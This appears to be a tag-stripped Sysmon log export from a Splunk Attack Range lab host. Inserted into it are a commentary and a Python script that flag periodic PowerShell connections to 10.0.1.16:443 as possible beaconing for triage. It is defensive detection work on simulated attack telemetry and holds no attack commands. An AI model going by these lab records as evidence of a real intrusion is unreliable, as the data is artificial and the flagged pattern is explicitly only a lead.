18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:43.564{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.564{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.559{B81B27B7-4F13-613A-5590-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.061{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C964B59E0D674BC5C1BE73A39660CC19,SHA256=3334A6DCB7BA9B11CD45A0530DF65FD35703A0FABD6067A94BAAE036D11478C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
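The export above has had its XML field tags stripped, so each Sysmon record reads as one run of concatenated values. Buried in it is a pattern worth pulling out: Event ID 3 (NetworkConnect) records from powershell.exe (PID 6940, user ATTACKRANGE\REED_SCHMIDT) to 10.0.1.16:443 at 18:14:53.575, 18:14:57.587, 18:15:01.593 and 18:15:06.606, with consecutive ephemeral source ports, alongside the Splunk stream forwarder (streamfwd.exe, PID 3616) connecting to 10.0.1.12:8000 about every five seconds. The records alone do not establish that the PowerShell connections are malicious, but short-interval, low-jitter outbound connections from a scripting host are exactly what a detection engineer would want to surface and triage. The script below is an added example, not part of this export or of Splunk Attack Range: it parses EID 3 records in this page's tag-stripped layout, groups connections by process and destination, and flags groups whose inter-connection intervals are nearly constant. The sample string is constructed from seven EID 3 records and one EID 23 record copied from this page; the KNOWN_AGENTS allowlist and the jitter threshold of 0.25 are assumptions standing in for a site baseline.

```python
"""Periodicity check over Sysmon Event ID 3 (NetworkConnect) records in the
tag-stripped layout seen on this page (added example, not part of the export)."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Field order of an EID 3 record once the XML tags are gone:
# UtcTime {ProcessGuid} ProcessId Image User Protocol Initiated SourceIsIpv6
# SourceIp SourceHostname SourcePort SourcePortName DestinationIsIpv6
# DestinationIp DestinationHostname DestinationPort DestinationPortName.
# "[^{}]" keeps a lazy group from running into the next record (every record
# carries a brace-delimited GUID); the port-name class keeps hostname digits
# from being read as the port.
EID3_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})"
    r"\{[0-9A-F-]{36}\}"
    r"(?P<pid>\d+)"
    r"(?P<image>[A-Z]:\\[^{}]+?\.exe)"
    r"(?P<user>[^{}]+?)"
    r"(?P<proto>tcp|udp)(?:true|false)(?:true|false)"
    r"(?P<src_ip>\d+\.\d+\.\d+\.\d+)"
    r"(?P<src_host>\S+?)(?P<src_port>\d+)[a-z-]*?(?:true|false)"
    r"(?P<dst_ip>\d+\.\d+\.\d+\.\d+)"
    r"(?P<dst_host>\S+?)(?P<dst_port>\d+)(?P<dst_port_name>[a-z-]*?)(?=\s|$)"
)

# Constructed sample: records copied from this page's export, one per string,
# joined by a space as on the page. The leading EID 23 (FileDelete) record is
# included to show that the parser ignores anything that is not EID 3.
SAMPLE = " ".join([
    r"23542300x800000000000000035085087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:29.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D29BE9204BAB1A511C5218C3477CF88C,SHA256=DC6C71F844EF34E1D96ADEC3B519B468BF7325F957B12C85498F7B6A8BFD7737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
    r"354300x800000000000000035085088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.575{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56694-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035085094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.587{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56695-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035085095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:59.085{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56696-false10.0.1.12-8000-",
    r"354300x800000000000000035085102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:01.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56697-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035085107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.124{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56698-false10.0.1.12-8000-",
    r"354300x800000000000000035085112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:06.606{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56699-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000035085143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:09.135{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56700-false10.0.1.12-8000-",
])

# Assumed site baseline: telemetry agents that are expected to poll on a timer.
# A path allowlist is weak on its own; in practice pair it with the EID 1
# hashes or signer of the binary.
KNOWN_AGENTS = {
    r"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe",
}


def parse_eid3(text):
    """Return one dict per EID 3 record found in the flattened export text."""
    return [m.groupdict() for m in EID3_RE.finditer(text)]


def to_time(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")


def group_connections(events):
    """Collect connection times keyed by (image, pid, destination ip, destination port)."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["image"], e["pid"], e["dst_ip"], e["dst_port"])].append(to_time(e["ts"]))
    return groups


def find_periodic(groups, min_events=3, max_jitter=0.25, exclude_images=()):
    """Flag groups whose inter-connection intervals are nearly constant.

    jitter = population std dev / mean of the intervals; 0 is a perfect clock.
    """
    hits = {}
    for key, times in groups.items():
        if key[0] in exclude_images or len(times) < min_events:
            continue
        ordered = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(ordered, ordered[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits[key] = {"count": len(times), "mean_interval": avg, "jitter": jitter}
    return hits


if __name__ == "__main__":
    hits = find_periodic(group_connections(parse_eid3(SAMPLE)), exclude_images=KNOWN_AGENTS)
    for (image, pid, ip, port), info in hits.items():
        print(f"{image} pid={pid} -> {ip}:{port}: {info['count']} connections, "
              f"mean {info['mean_interval']:.3f}s, jitter {info['jitter']:.3f}")
```

Run as-is, both groups are periodic (PowerShell at a mean of about 4.34 s with jitter around 0.11, streamfwd.exe at about 5.03 s with jitter under 0.01); the allowlist removes the forwarder and leaves only the PowerShell connections for triage. Two caveats: a regex over the tag-stripped layout is a convenience for reading this page, and a real pipeline should consume the Sysmon XML or the forwarder's JSON instead; and a low jitter score is a lead, not a verdict, so the next step is to pin the process down with its EID 1 record (parent, command line, hashes) rather than to act on periodicity alone.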
10341000x800000000000000035085151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.911{B81B27B7-4F14-613A-5890-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:09.135{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56700-false10.0.1.12-8000- 10341000x800000000000000035085142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.611{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
